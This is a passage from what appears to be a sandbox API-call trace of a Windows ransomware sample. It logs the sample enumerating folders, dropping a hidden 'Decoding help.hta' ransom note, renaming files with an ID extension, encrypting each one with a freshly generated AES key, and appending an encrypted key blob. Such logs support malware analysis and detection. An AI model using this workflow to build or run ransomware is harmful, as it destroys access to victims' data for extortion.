ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.821] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.821] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917df180, ftCreationTime.dwHighDateTime=0x1d51fa6, ftLastAccessTime.dwLowDateTime=0x5e477f60, ftLastAccessTime.dwHighDateTime=0x1d52236, ftLastWriteTime.dwLowDateTime=0x5e477f60, ftLastWriteTime.dwHighDateTime=0x1d52236, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="especially-ccd-facilitate.exe", cAlternateFileName="ESPECI~1.EXE")) returned 1 [0039.828] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*" [0039.829] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*") returned 52 [0039.829] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\Decoding help.hta" [0039.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\Decoding help.hta" (normalized: "c:\\program files (x86)\\uninstall information\\decoding help.hta")) returned 0xffffffff [0039.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\Decoding help.hta" (normalized: "c:\\program files (x86)\\uninstall information\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0039.829] WriteFile (in: hFile=0x230, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa28fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa28fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.830] CloseHandle (hObject=0x230) returned 1 [0039.830] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.830] lstrcmpiW (lpString1="Decoding help.hta", lpString2="especially-ccd-facilitate.exe") returned -1 [0039.830] lstrlenW (lpString="especially-ccd-facilitate.exe") returned 29 [0039.830] lstrcmpiW (lpString1="[ID]", lpString2=".exe") returned 1 [0039.830] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*" [0039.830] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*") returned 52 [0039.830] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\", lpString2="especially-ccd-facilitate.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe" [0039.830] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe" [0039.830] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe" (normalized: "c:\\program files (x86)\\uninstall information\\especially-ccd-facilitate.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\uninstall information\\especially-ccd-facilitate.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.831] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\uninstall information\\especially-ccd-facilitate.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0039.831] CreateFileMappingA (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x234 [0039.831] CryptAcquireContextA (in: phProv=0xa28fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa28fcec*=0x5b0220) returned 1 [0039.832] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa28fce8 | out: phKey=0xa28fce8*=0x5a5830) returned 1 [0039.832] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa28fbe4, pdwDataLen=0xa28fce4 | out: pbData=0xa28fbe4*, pdwDataLen=0xa28fce4*=0x2c) returned 1 [0039.832] MapViewOfFile (hFileMappingObject=0x234, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x9090000 [0039.835] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa28fbe4*, pdwDataLen=0xa28fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa28fbe4*, pdwDataLen=0xa28fcf8*=0x100) returned 1 [0039.835] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9090000, pdwDataLen=0xa28fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x9090000*, pdwDataLen=0xa28fce4*=0x12800) returned 1 [0039.836] UnmapViewOfFile (lpBaseAddress=0x9090000) returned 1 [0039.838] CloseHandle (hObject=0x234) returned 1 [0039.838] CryptDestroyKey (hKey=0x5a5830) returned 1 [0039.838] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.838] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.838] WriteFile (in: hFile=0x230, lpBuffer=0xa28fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa28fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa28fbe4*, lpNumberOfBytesWritten=0xa28fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.838] WriteFile (in: hFile=0x230, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa28fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa28fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.839] CloseHandle (hObject=0x230) returned 1 [0039.840] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\especially-ccd-facilitate.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.840] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917df180, ftCreationTime.dwHighDateTime=0x1d51fa6, ftLastAccessTime.dwLowDateTime=0x5e477f60, ftLastAccessTime.dwHighDateTime=0x1d52236, ftLastWriteTime.dwLowDateTime=0x5e477f60, ftLastWriteTime.dwHighDateTime=0x1d52236, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="especially-ccd-facilitate.exe", cAlternateFileName="ESPECI~1.EXE")) returned 0 [0039.840] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 102 os_tid = 0xbcc [0039.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*", lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0039.826] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.826] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.886] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.886] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bdbd7c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.886] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.886] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.886] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.888] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.888] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.888] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US" [0039.888] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" [0039.888] GlobalMemoryStatus (in: lpBuffer=0xa3cfd10 | out: lpBuffer=0xa3cfd10) [0039.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a33bc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0039.922] CloseHandle (hObject=0x234) returned 1 [0039.922] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcc1c145, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xdcc1c145, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ab7c5c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpAsDesc.dll", cAlternateFileName="")) returned 1 [0039.922] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.922] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.922] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" [0039.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta")) returned 0xffffffff [0039.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0039.922] WriteFile (in: hFile=0x234, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa3cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa3cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.923] CloseHandle (hObject=0x234) returned 1 [0039.923] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.924] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpAsDesc.dll") returned -1 [0039.924] lstrlenW (lpString="MpAsDesc.dll") returned 12 [0039.924] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.924] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="MpAsDesc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" [0039.924] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" [0039.924] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.924] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7732a07, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe7732a07, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ab7c5c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5fe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpClient.dll", cAlternateFileName="")) returned 1 [0039.924] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.924] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" [0039.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta")) returned 0x1 [0039.925] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpClient.dll") returned -1 [0039.925] lstrlenW (lpString="MpClient.dll") returned 12 [0039.925] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.925] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.925] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="MpClient.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" [0039.925] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" [0039.925] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpclient.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\mpclient.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.952] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde9910bf, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xde9910bf, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ac13ba0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpOAV.dll", cAlternateFileName="")) returned 1 [0039.952] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.952] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.952] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" [0039.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta")) returned 0x1 [0039.952] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpOAV.dll") returned -1 [0039.952] lstrlenW (lpString="MpOAV.dll") returned 9 [0039.952] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.953] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="MpOAV.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" [0039.953] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.953] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe6c321, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xdbe6c321, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6c6758d0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpLics.dll", cAlternateFileName="")) returned 1 [0039.953] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.953] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" [0039.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta")) returned 0x1 [0039.953] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MsMpLics.dll") returned -1 [0039.953] lstrlenW (lpString="MsMpLics.dll") returned 12 [0039.953] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.953] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="MsMpLics.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" [0039.953] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.953] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978373c0, ftCreationTime.dwHighDateTime=0x1d4becb, ftLastAccessTime.dwLowDateTime=0x6421bf90, ftLastAccessTime.dwHighDateTime=0x1d4d56a, ftLastWriteTime.dwLowDateTime=0x6421bf90, ftLastWriteTime.dwHighDateTime=0x1d4d56a, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="treaty_olive.exe", cAlternateFileName="TREATY~1.EXE")) returned 1 [0039.953] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.953] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.953] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" [0039.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\decoding help.hta")) returned 0x1 [0039.954] lstrcmpiW (lpString1="Decoding help.hta", lpString2="treaty_olive.exe") returned -1 [0039.954] 